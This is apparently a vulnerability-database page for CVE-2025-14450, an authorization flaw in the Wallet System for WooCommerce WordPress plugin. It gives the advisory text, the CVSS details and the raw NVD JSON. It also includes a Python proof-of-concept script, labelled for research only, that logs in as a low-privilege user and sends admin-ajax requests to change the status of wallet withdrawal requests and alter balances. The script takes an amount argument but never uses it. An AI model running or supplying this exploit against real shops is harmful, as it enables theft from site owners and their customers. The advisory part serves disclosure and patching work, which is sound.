Security Vulnerability Report
中文
CVE-2025-14450 CVSS 6.5 MEDIUM

CVE-2025-14450

Published: 2026-01-17 03:16:03
Last Modified: 2026-04-15 00:35:42

Description

The Wallet System for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'change_wallet_fund_request_status_callback' function in all versions up to, and including, 2.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to manipulate wallet withdrawal requests and arbitrarily increase their wallet balance or decrease other users' balances.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Wallet System for WooCommerce <= 2.7.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-14450 PoC - Wallet System for WooCommerce Authorization Bypass # Target: WordPress site with vulnerable Wallet System for WooCommerce plugin <= 2.7.2 def exploit_wallet_system(target_url, username, password, victim_user_id, amount): """ Exploit IDOR vulnerability in change_wallet_fund_request_status_callback Allows attackers to manipulate wallet withdrawal requests and modify balances """ session = requests.Session() # Step 1: Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/", 'testcookie': '1' } login_response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful") # Step 2: Get withdrawal request list (enumerate request IDs) # Note: Attackers can also guess request IDs list_url = f"{target_url}/wp-admin/admin-ajax.php" list_data = { 'action': 'wallet_fund_request_list', 'length': 100, 'start': 0 } list_response = session.post(list_url, data=list_data) # Step 3: Exploit the vulnerability - change withdrawal request status # Set status to 'approved' to credit attacker's wallet exploit_data = { 'action': 'change_wallet_fund_request_status', 'request_id': 1, # Target withdrawal request ID 'status': 'approved', # Can also be 'rejected' to affect other users 'user_id': victim_user_id # Target user ID } exploit_response = session.post(list_url, data=exploit_data) if 'success' in exploit_response.text or 'true' in exploit_response.text.lower(): print(f"[+] Successfully manipulated withdrawal request status") print(f"[*] Attacker can increase balance or decrease victim's balance") return True else: print("[-] Exploitation may have failed or returned unexpected response") print(f"[*] Response: {exploit_response.text[:200]}") return False if __name__ == "__main__": if len(sys.argv) < 6: print("Usage: python cve-2025-14450_poc.py <target_url> <username> <password> <victim_id> <amount>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] victim = sys.argv[4] amt = sys.argv[5] exploit_wallet_system(target, user, pwd, victim, amt)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14450", "sourceIdentifier": "[email protected]", "published": "2026-01-17T03:16:03.367", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Wallet System for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'change_wallet_fund_request_status_callback' function in all versions up to, and including, 2.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to manipulate wallet withdrawal requests and arbitrarily increase their wallet balance or decrease other users' balances."}, {"lang": "es", "value": "El plugin Wallet System para WooCommerce para WordPress es vulnerable a la modificación no autorizada de datos debido a una comprobación de capacidad faltante en la función 'change_wallet_fund_request_status_callback' en todas las versiones hasta la 2.7.2, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel Suscriptor y superior, manipulen las solicitudes de retiro de monedero y aumenten arbitrariamente su saldo de monedero o disminuyan los saldos de otros usuarios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wallet-system-for-woocommerce/tags/2.7.2/includes/class-wallet-system-ajaxhandler.php#L140", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wallet-system-for-woocommerce/trunk/includes/class-wallet-system-ajaxhandler.php#L140", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3435898%40wallet-system-for-woocommerce&new=3435898%40wallet-system-for-woocommerce&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/466a5315-fc05-4b96-9dfd-17862fc406c5?source=cve", "source": "[email protected]"}]}}